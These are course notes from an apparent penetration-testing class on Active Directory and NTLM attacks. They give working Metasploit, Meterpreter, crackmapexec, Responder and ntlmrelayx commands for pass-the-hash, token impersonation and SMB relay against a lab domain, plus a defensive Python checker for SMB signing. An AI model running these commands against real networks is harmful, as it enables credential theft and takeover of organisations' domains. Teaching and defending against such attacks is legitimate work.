# Week 9: NTLM

**Active Directory Exploitation** - This lesson focuses on the recognition of vulnerabilities and exploitation tactics in an internal Active Directory environment. Attacks that will be introduced include: LLMNR poisoning/hash cracking, SMB hash relaying, pass the hash, token impersonation, kerberoasting, GPP/c-password attacks, and PowerShell attacks. More attacks will likely be added as the lesson is written, but the most common have been provided.

## Important Readings

{% embed url="<https://www.fuzzysecurity.com/tutorials/16.html>" %}

{% embed url="<https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa>" %}

## Notes

### CrackMapExec and psexec

* install crackmapexec

![crackmapexec smb \<ip range> -u Administrator -p 'P@$$word!' -d MARVEL](https://1094113337-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3hoduT4ByoNaznkzhG%2F-MFJ-7pBAvVa6C_ZWUAp%2F-MFJ0An9CtdMNWQejP8_%2F2020-08-21%2019_34_20-Window.png?alt=media\&token=6eac011d-6c36-4fd7-8d65-204e544d624c)

* msf5 > use exploit/windows/smb/psexec

![](https://1094113337-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3hoduT4ByoNaznkzhG%2F-MFJ-7pBAvVa6C_ZWUAp%2F-MFJ0j6ZIYA1NgGG5bMA%2F2020-08-21%2019_36_52-Window.png?alt=media\&token=7c30a6d4-7c0b-4e10-97d9-73e1219922b5)

* try all the target options for psexec: `set target 3`
  * Automatic
  * Powershell
  * Native Upload
  * MOF upload
* sysinfo
  * x64 Architecture but 32-bit Meterpreter
  * you can look through the payloads and sometimes find a better one

```
meterpreter > load incognito
meterpreter > list_tokens -u # users
meterpreter > list_tokens -g # group
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token MARVEL\\Administrator
[+] Delegation token available
[+] Successfully impersonated user MARVEL\Administrator
meterpreter > getuid
Server username: MARVEL\Administrator
meterpreter > shell
...
C:\Windows\system32>whoami
marvel\administrator
```

In a Meterpreter shell, type `load` and hit tab twice to see all the extensions you can load, e.g. kiwi, mimikatz

```
# with a meterpreter session running
msf5 > use post/multi/recon/local_exploit_suggester
msf5 post(post/multi/recon/local_exploit_suggester) > set session 1
msf5 post(post/multi/recon/local_exploit_suggester) > run
...
# enter session
msf5 > sessions 1
# check processes
meterpreter > ps
```

* Process migration: migrate into a 64-bit process to get an x64 Meterpreter shell

![](https://1094113337-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3hoduT4ByoNaznkzhG%2F-MFJ-7pBAvVa6C_ZWUAp%2F-MFJ4GZJP-pLD5Pg2Dto%2F2020-08-21%2019_52_18-Window.png?alt=media\&token=11a2334d-a86a-4cd5-9fba-a42869f0bf50)

* Local Administrator account could be the same across many computers if IT images them from the same base image.
* You can pass the hash with `crackmapexec -H` or with `psexec`

### NTLM Relay

If communications are not digitally signed, you can relay NTLM authentication. SMB signing is off by default on Windows workstations and member servers (domain controllers require it).
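A defender-side check for the signing condition above, added here and not part of the course notes: parse the SecurityMode field of an SMB2 NEGOTIATE response to tell whether a host would accept an unsigned relayed session. The packet bytes are constructed in the block rather than captured, and the field layout follows MS-SMB2 2.2.1.2 (header) and 2.2.4 (NEGOTIATE response); it also covers the in-between case where signing is enabled but not required, which is still relayable.

```python
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000            # Command field value for NEGOTIATE
SMB2_FLAGS_SERVER_TO_REDIR = 0x01  # set on every server-to-client message
SIGNING_ENABLED = 0x01             # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x02            # SMB2_NEGOTIATE_SIGNING_REQUIRED

def parse_negotiate_response(pkt: bytes) -> dict:
    """Dialect and signing flags from an SMB2 NEGOTIATE response (no NetBIOS header)."""
    if len(pkt) < 128:  # 64-byte header + 64-byte fixed response body
        raise ValueError("too short for an SMB2 NEGOTIATE response")
    if pkt[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    # Header (MS-SMB2 2.2.1.2): StructureSize, CreditCharge, Status, Command,
    # CreditResponse, Flags follow the 4-byte ProtocolId.
    hdr_size, _, status, command, _, flags = struct.unpack_from("<HHIHHI", pkt, 4)
    if hdr_size != 64 or command != SMB2_NEGOTIATE:
        raise ValueError("not a NEGOTIATE message")
    if not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("client request, not a server response")
    if status != 0:
        raise ValueError(f"server returned NT status 0x{status:08x}")
    # Body (MS-SMB2 2.2.4): StructureSize (always 65), SecurityMode, DialectRevision.
    body_size, security_mode, dialect = struct.unpack_from("<HHH", pkt, 64)
    if body_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return {"dialect": dialect,
            "signing_enabled": bool(security_mode & SIGNING_ENABLED),
            "signing_required": bool(security_mode & SIGNING_REQUIRED)}

def relay_exposure(pkt: bytes) -> str:
    """Classify a host's signing posture for an NTLM relay risk review."""
    info = parse_negotiate_response(pkt)
    if info["signing_required"]:
        return "signing required: relayed sessions are rejected"
    if info["signing_enabled"]:
        return "signing enabled but not required: still relayable"
    return "signing disabled: relayable"

def build_sample_response(security_mode: int, dialect: int = 0x0302,
                          from_server: bool = True) -> bytes:
    """Constructed NEGOTIATE response for offline testing; not a real capture."""
    flags = SMB2_FLAGS_SERVER_TO_REDIR if from_server else 0
    header = SMB2_MAGIC + struct.pack("<HHIHHIIQIIQ16s", 64, 0, 0, SMB2_NEGOTIATE,
                                     1, flags, 0, 0, 0, 0, 0, b"\0" * 16)
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, security_mode, dialect, 0,
                       b"\0" * 16, 0, 65536, 65536, 65536, 0, 0, 128, 0, 0)
    return header + body
```

To audit real hosts, feed `relay_exposure` the SMB2 message from a captured NEGOTIATE response (strip the 4-byte NetBIOS session header first); anything other than "signing required" is a host where enforcing signing closes the relay path.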

* Heath demonstrates an environment where a user has administrative privileges on multiple machines.
* Edit Responder.conf: turn off the SMB and HTTP servers so Responder only poisons and does not answer the authentication itself
* Start `Responder.py -I eth0 -rdw`
  * Wait

![](https://1094113337-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M3hoduT4ByoNaznkzhG%2F-MFJ7F8GHKGTmbLFffoY%2F-MFJ8KlfytYa5sQErviV%2F2020-08-21%2020_10_02-Window.png?alt=media\&token=ec87f7e6-79d5-4319-bb20-e95f16a6a68e)

```
locate ntlmrelayx.py # it's in impacket
python ntlmrelayx.py -tf target.txt -smb2support
```

* Point a victim machine at yours in File Explorer, e.g. `\\192.168.202.173`
